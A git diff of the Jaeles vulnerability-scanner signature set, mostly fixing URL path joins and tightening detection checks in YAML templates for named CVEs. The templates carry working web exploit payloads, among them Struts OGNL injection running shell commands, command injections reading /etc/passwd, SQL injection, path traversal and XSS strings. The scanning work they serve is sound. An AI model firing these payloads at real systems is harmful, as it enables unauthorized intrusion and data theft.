diff --git a/README.md b/README.md
index aff73ae..1dbcfea 100644
--- a/README.md
+++ b/README.md
@@ -9,7 +9,6 @@
***
-
This repo only contain Default Signatures for Jaeles project. Pull requests or any ideas are welcome.
@@ -119,6 +118,18 @@ Fuzz signatures may have many false positive because I can't defined exactly wha
Become a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/jaeles-project/contribute)]
+## Special Thanks
+
+
+
+Explore the latest vulnerabilities at cvebase.com
+
+
+
+
+
+
## License
`Jaeles` is made with ♥ by [@j3ssiejjj](https://twitter.com/j3ssiejjj) and it is released under the MIT license.
diff --git a/cves/apache-ofbiz-xss-cve-2020-9496.yaml b/cves/apache-ofbiz-xss-cve-2020-9496.yaml
index 0802cc2..5a18718 100644
--- a/cves/apache-ofbiz-xss-cve-2020-9496.yaml
+++ b/cves/apache-ofbiz-xss-cve-2020-9496.yaml
@@ -4,13 +4,12 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
-
+ - root: '{{.BaseURL}}'
requests:
- method: POST
url: >-
- {{.root}}webtools/control/xmlrpc
+ {{.root}}/webtools/control/xmlrpc
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Origin: http://{{.Host}}
diff --git a/cves/apache-struts-rce-cve-2013-2251.yaml b/cves/apache-struts-rce-cve-2013-2251.yaml
index 3999bfc..f6f0417 100644
--- a/cves/apache-struts-rce-cve-2013-2251.yaml
+++ b/cves/apache-struts-rce-cve-2013-2251.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,19 +13,19 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+ {{.root}}/{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "uid=")
+ StatusCode() == 200 && StringSearch("body", "uid=") && StringSearch("body", "gid=")
- method: GET
url: >-
- {{.root}}{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+ {{.root}}/{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "uid=")
+ StatusCode() == 200 && StringSearch("body", "uid=") && StringSearch("body", "gid=")
references:
- https://www.cvebase.com/cve/2013/2251
diff --git a/cves/apache-struts-rce-cve-2017-5638.yaml b/cves/apache-struts-rce-cve-2017-5638.yaml
index b8f709b..14ce59f 100644
--- a/cves/apache-struts-rce-cve-2017-5638.yaml
+++ b/cves/apache-struts-rce-cve-2017-5638.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
@@ -15,10 +15,10 @@ requests:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data"
- Pragma: no-cache
- - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
-
+ - Accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*'
detections:
- >-
StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase")
+
references:
- https://www.cvebase.com/cve/2017/5638
diff --git a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
index 2f5f6d5..f67ecaf 100644
--- a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
+++ b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml
index e522016..762dd2a 100644
--- a/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml
+++ b/cves/apache-tomcat-open-redirect-cve-2018-11784.yaml
@@ -7,12 +7,12 @@ requests:
- method: GET
redirect: false
url: >-
- {{.BaseURL}}//google.com
+ {{.BaseURL}}//bing.com
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
+ StatusCode() == 302 && StringSearch('resHeader', 'bing.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
reference:
- https://www.cvebase.com/cve/2018/11784
\ No newline at end of file
diff --git a/cves/apache-tomcat-put-cve-2017-12615.yaml b/cves/apache-tomcat-put-cve-2017-12615.yaml
index ae0275a..ac268a6 100644
--- a/cves/apache-tomcat-put-cve-2017-12615.yaml
+++ b/cves/apache-tomcat-put-cve-2017-12615.yaml
@@ -1,4 +1,5 @@
id: CVE-2017-12615
+single: true
info:
name: Tomcat PUT method allowed
risk: High
@@ -6,7 +7,6 @@ info:
variables:
- ran: RandomString(6)
-
requests:
- method: PUT
redirect: false
diff --git a/cves/apache-tomcat-rce-cve-2020-9484.yaml b/cves/apache-tomcat-rce-cve-2020-9484.yaml
index 17308e8..ab9f188 100644
--- a/cves/apache-tomcat-rce-cve-2020-9484.yaml
+++ b/cves/apache-tomcat-rce-cve-2020-9484.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
+ {{.root}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy
diff --git a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
index 1658a6c..e678464 100644
--- a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
+++ b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
+ {{.root}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/artifactory-improper-authorization-cve-2019-9733.yaml b/cves/artifactory-improper-authorization-cve-2019-9733.yaml
index c6cdd96..0e99166 100644
--- a/cves/artifactory-improper-authorization-cve-2019-9733.yaml
+++ b/cves/artifactory-improper-authorization-cve-2019-9733.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?_spring_security_remember_me=false
+ {{.root}}/{{.endpoint}}?_spring_security_remember_me=false
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- X-Requested-With: artUI
@@ -20,12 +20,13 @@ requests:
- X-Forwarded-For: 127.0.0.1
- Request-Agent: artifactoryUI
- Content-Type: application/json
- - Origin: http://{{Hostname}}
- - Referer: http://{{Hostname}}/artifactory/webapp/
+ - Origin: http://{{.Host}}
+ - Referer: http://{{.Host}}/artifactory/webapp/
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- Connection: close
- body: {"user":"access-admin","password":"password","type":"login"}
+ body: |
+ {"user":"access-admin","password":"password","type":"login"}
detections:
- >-
StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"')
diff --git a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
index 705d46d..daeaf65 100644
--- a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
+++ b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
@@ -4,21 +4,23 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
rest/tinymce/1/macro/preview
+
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- body: {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+ body: |
+ {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "contextConfigLocation ")
+ StatusCode() == 200 && StringSearch("resBody", "contextConfigLocation ") && StringSearch("resHeaders", "application/xml")
references:
- https://www.cvebase.com/cve/2019/3396
diff --git a/cves/atlassian-confluence-xss-cve-2018-5230.yaml b/cves/atlassian-confluence-xss-cve-2018-5230.yaml
index e7d7343..64f4707 100644
--- a/cves/atlassian-confluence-xss-cve-2018-5230.yaml
+++ b/cves/atlassian-confluence-xss-cve-2018-5230.yaml
@@ -4,19 +4,22 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: "{{.BaseURL}}"
-variables:
- - endpoint: |
- pages/includes/
-requests:
+replicate:
+ ports: '8080'
+ prefixes: 'jira, wiki, confluence'
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
+ {{.root}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", 'SRC="javascript:alert(1337)">')
+ StatusCode() == 200 && StringSearch('response', 'javascript:alert(1337)') && StringSearch('response', 'LowestInnerExceptionMessage')
+
references:
- https://www.cvebase.com/cve/2018/5230
diff --git a/cves/atlassian-rce-cve-2019-11580.yaml b/cves/atlassian-rce-cve-2019-11580.yaml
index f9be9f7..c74bc8b 100644
--- a/cves/atlassian-rce-cve-2019-11580.yaml
+++ b/cves/atlassian-rce-cve-2019-11580.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?cmd=cat%20/etc/passwd
+ {{.root}}/{{.endpoint}}?cmd=cat%20/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-asa-path-traversal-cve-2018-0296.yaml b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml
index 502fd94..d056e7f 100644
--- a/cves/cisco-asa-path-traversal-cve-2018-0296.yaml
+++ b/cves/cisco-asa-path-traversal-cve-2018-0296.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
+ {{.root}}/{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-asa-path-traversal-cve-2020-3187.yaml b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml
index 406a1c0..d320023 100644
--- a/cves/cisco-asa-path-traversal-cve-2020-3187.yaml
+++ b/cves/cisco-asa-path-traversal-cve-2020-3187.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-asa-path-traversal-cve-2020-3452.yaml b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml
index 1262c13..c7a013d 100644
--- a/cves/cisco-asa-path-traversal-cve-2020-3452.yaml
+++ b/cves/cisco-asa-path-traversal-cve-2020-3452.yaml
@@ -1,5 +1,4 @@
id: CVE-2020-3452
-donce: true
info:
name: Cisco ASA - Unauthenticated LFI and Delete File (CVE-2020-3452)
risk: High
@@ -12,7 +11,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
+ {{.root}}//+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
@@ -23,14 +22,13 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
+ {{.root}}//+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("body", "GET_OUT_RESOURCE") && StringSearch("resHeaders", "application/octet-stream")
-
reference:
- links:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
diff --git a/cves/cisco-dos-cve-2020-16139.yaml b/cves/cisco-dos-cve-2020-16139.yaml
index 5e28628..22b296c 100644
--- a/cves/cisco-dos-cve-2020-16139.yaml
+++ b/cves/cisco-dos-cve-2020-16139.yaml
@@ -4,7 +4,7 @@ info:
risk: Low
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ {{.root}}/{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml
index bffdf95..9de8baa 100644
--- a/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml
+++ b/cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/citrix-adc-lfi-cve-2020-8193.yaml b/cves/citrix-adc-lfi-cve-2020-8193.yaml
index 33b3447..af26b05 100644
--- a/cves/citrix-adc-lfi-cve-2020-8193.yaml
+++ b/cves/citrix-adc-lfi-cve-2020-8193.yaml
@@ -15,7 +15,7 @@ requests:
- method: POST
redirect: false
url: >-
- {{.root}}/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
+ {{.root}}//pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Accept: application/xml
@@ -37,7 +37,7 @@ requests:
method: POST
redirect: false
url: >-
- {{.root}}/rapi/filedownload?filter=path:{{.file}}
+ {{.root}}//rapi/filedownload?filter=path:{{.file}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Accept: application/xml
diff --git a/cves/citrix-adc-path-traversal-cve-2019-19781.yaml b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml
index 4599d61..1266bb7 100644
--- a/cves/citrix-adc-path-traversal-cve-2019-19781.yaml
+++ b/cves/citrix-adc-path-traversal-cve-2019-19781.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}../vpns/cfg/smb.conf
+ {{.root}}/{{.endpoint}}../vpns/cfg/smb.conf
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -21,7 +21,7 @@ requests:
- method: POST
redirect: false
url: >-
- {{.BaseURL}}{{.endpoint}}../vpns/portal/scripts/newbm.pl
+ {{.root}}/{{.endpoint}}../vpns/portal/scripts/newbm.pl
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- NSC_USER: ../../../netscaler/portal/templates/somuniquestr
@@ -36,13 +36,14 @@ requests:
- method: GET
redirect: false
url: >-
- {{.BaseURL}}{{.endpoint}}../vpns/portal/somuniquestr.xml
+ {{.root}}/{{.endpoint}}../vpns/portal/somuniquestr.xml
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- NSC_USER: nsroot
- NSC_NONCE: nsroot
detections:
- >-
- StatusCode() == 200 && StringSearch("response", "root:")
+ StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")
+
references:
- https://www.cvebase.com/cve/2019/19781
diff --git a/cves/citrix-code-injection-cve-2020-8194.yaml b/cves/citrix-code-injection-cve-2020-8194.yaml
index 07fa93b..2f8cbc9 100644
--- a/cves/citrix-code-injection-cve-2020-8194.yaml
+++ b/cves/citrix-code-injection-cve-2020-8194.yaml
@@ -1,15 +1,15 @@
id: CVE-2020-8194
info:
name: Citrix CDC & Gateway Code Injection
- risk: High
+ risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
+ {{.root}}/menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
diff --git a/cves/citrix-path-traversal-cve-2020-7473.yaml b/cves/citrix-path-traversal-cve-2020-7473.yaml
index 74aa786..5384f98 100644
--- a/cves/citrix-path-traversal-cve-2020-7473.yaml
+++ b/cves/citrix-path-traversal-cve-2020-7473.yaml
@@ -11,20 +11,12 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
+ {{.root}}//XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch('body', 'bit app support') && StringSearch('body', 'extensions')
- - method: GET
- redirect: false
- url: >-
- {{.root}}/UploadTest.aspx
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && ContentLength('body') == 0 && StringSearch('resHeader', 'Access-Control-Allow-Origin: *')
+
references:
- https://www.cvebase.com/cve/2020/7473
diff --git a/cves/citrix-reflected-xss-cve-2020-8191.yaml b/cves/citrix-reflected-xss-cve-2020-8191.yaml
index fb47ed1..1aa2492 100644
--- a/cves/citrix-reflected-xss-cve-2020-8191.yaml
+++ b/cves/citrix-reflected-xss-cve-2020-8191.yaml
@@ -4,12 +4,12 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: POST
url: >-
- {{.root}}menu/stapp
+ {{.root}}/menu/stapp
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
diff --git a/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml
index d770689..0455838 100644
--- a/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml
+++ b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml
@@ -4,13 +4,13 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
+ {{.root}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/comodo-utmc-rce-cve-2018-17431.yaml b/cves/comodo-utmc-rce-cve-2018-17431.yaml
index 850a267..9e1d118 100644
--- a/cves/comodo-utmc-rce-cve-2018-17431.yaml
+++ b/cves/comodo-utmc-rce-cve-2018-17431.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}u?s==5&w=218&h=15&k=%0a&l=62&_=5621298674064
+ {{.root}}/{{.endpoint}}u?s==5&w=218&h=15&k=%0a&l=62&_=5621298674064
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
@@ -20,7 +20,7 @@ requests:
StatusCode() == 200 && StringSearch("resBody", "Configuration has been altered")
- method: GET
url: >-
- {{.root}}{{.endpoint}}u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
+ {{.root}}/{{.endpoint}}u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml
index 48e78d2..3613f65 100644
--- a/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml
+++ b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}/etc/passwd
+ {{.root}}/{{.endpoint}}/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/emerge-rce-cve-2019-7256.yaml b/cves/emerge-rce-cve-2019-7256.yaml
index 0541db7..b0bf0bb 100644
--- a/cves/emerge-rce-cve-2019-7256.yaml
+++ b/cves/emerge-rce-cve-2019-7256.yaml
@@ -4,13 +4,12 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
-
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20cvebase.txt%60
+ {{.root}}/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20cvebase.txt%60
headers:
